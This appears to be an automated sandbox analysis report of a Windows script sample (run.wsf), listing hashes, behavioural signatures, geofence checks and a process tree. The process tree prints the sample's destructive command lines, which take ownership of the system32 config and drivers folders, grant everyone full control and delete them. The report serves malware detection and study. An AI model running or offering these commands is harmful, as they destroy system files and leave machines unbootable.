Analysis
max time kernel: 54s
max time network: 38s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15-08-2024 21:19
Static task: static1
Behavioral task: behavioral1
Sample: run.wsf
Resource: win7-20240704-en
General
Target: run.wsf
Size: 1KB
MD5: 99fe84c9ee9bc7854959c3165e316326
SHA1: 1571568802ba5b5673786920c59e78affd569104
SHA256: bc6bad8cc9c846a3496955805bcfab7d1df5e12a8c60fa266c526a3051c99745
SHA512: 8e626408da6547162fd5fa03c6d2965b584a0149729348c292d4ec7da84194f1688bd5342b30321bfdc9264566a9ed11262f5b44a9ba4d22ba57eaedd824f7e1
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes:
  pid   process
  3660  takeown.exe
  5004  takeown.exe
  2160  icacls.exe
  4892  icacls.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
  description        ioc                                                                                                   process
  Key value queried  \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation  WScript.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes:
  pid   process
  4892  icacls.exe
  3660  takeown.exe
  5004  takeown.exe
  2160  icacls.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes:
  pid   process
  4956  Notepad.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
  description                      pid   process
  Token: SeTakeOwnershipPrivilege  5004  takeown.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
  description                       pid   process      target process
  PID 3324 wrote to memory of 4712  3324  WScript.exe  cmd.exe
  PID 3324 wrote to memory of 4712  3324  WScript.exe  cmd.exe
  PID 3324 wrote to memory of 1788  3324  WScript.exe  cmd.exe
  PID 3324 wrote to memory of 1788  3324  WScript.exe  cmd.exe
  PID 4712 wrote to memory of 3660  4712  cmd.exe      takeown.exe
  PID 4712 wrote to memory of 3660  4712  cmd.exe      takeown.exe
  PID 1788 wrote to memory of 5004  1788  cmd.exe      takeown.exe
  PID 1788 wrote to memory of 5004  1788  cmd.exe      takeown.exe
  PID 4712 wrote to memory of 2160  4712  cmd.exe      icacls.exe
  PID 4712 wrote to memory of 2160  4712  cmd.exe      icacls.exe
  PID 1788 wrote to memory of 4892  1788  cmd.exe      icacls.exe
  PID 1788 wrote to memory of 4892  1788  cmd.exe      icacls.exe
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"
  PID: 1256
- C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 4868
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.vbs"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  PID: 3324
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
    Signatures: Suspicious use of WriteProcessMemory
    PID: 4712
    - C:\Windows\system32\takeown.exe
      Command line: takeown /f c:\windows\system32\config\*
      Signatures: Possible privilege escalation attempt; Modifies file permissions
      PID: 3660
    - C:\Windows\system32\icacls.exe
      Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
      Signatures: Possible privilege escalation attempt; Modifies file permissions
      PID: 2160
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1788
    - C:\Windows\system32\takeown.exe
      Command line: takeown /f c:\windows\system32\drivers\*
      Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      PID: 5004
    - C:\Windows\system32\icacls.exe
      Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
      Signatures: Possible privilege escalation attempt; Modifies file permissions
      PID: 4892
- C:\Windows\System32\Notepad.exe
  Command line: "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\GetUninstall.vbs
  Signatures: Opens file in notepad (likely ransom note)
  PID: 4956
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\RestartBackup.vbs"
  PID: 5052
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SaveUnpublish.vbs"
  PID: 3768
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 57B
  MD5: 0fd6fb32bda4ebd6d5f4695335b1ad36
  SHA1: 5bf718741d02e633316ced147dbcf9d4d31e4200
  SHA256: 73a3849e7141aac5569d2493129b00f6b833c7c16d87470c0557386b20215c8c
  SHA512: fde517c0ff84560900c86f37a4c33208862092902d83d2d6028b870bad6bb14fe139ea7fa2fa6e21da8cd29ed2bf2a5410eaf45e094882f72cdfde27d4a38696